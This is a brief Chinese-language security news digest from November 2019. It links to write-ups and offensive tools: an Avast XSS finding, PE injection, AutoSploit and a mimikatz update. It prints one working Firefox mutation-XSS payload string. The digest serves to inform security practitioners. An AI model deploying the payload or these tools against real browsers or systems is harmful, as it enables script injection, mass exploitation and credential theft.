安全问题（2019年11月2日）

问题

1、5,000 USD XSS Issue at Avast Desktop AntiVirus for Windows (Yes, Desktop!)

https://medium.com/bugbountywriteup/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968

2、Firefox mXSS

payload:

<svg<b<style<imgid="&lt;/style&gt;&lt;imgsrc=1onerror=alert(1)&gt;">

3、PE Injection: Executing PEs inside Remote Processes

https://ired.team/offensive-security/code-injection-process-injection/pe-injection-executing-pes-inside-remote-processes

4、AutoSploit v4.0 - Automated Mass Exploiter

https://www.kitploit.com/2019/10/autosploit-v40-automated-mass-exploiter.html

5、updated mimikatz 2.1 to 2.2 latest (31 oct 2019)

fixed VirtualAlloc issues on Win 10 version 1903 build 18362

https://github.com/PowerShellMafia/PowerSploit/pull/336

更多资讯 请关注 鸿鹄实验室↓↓↓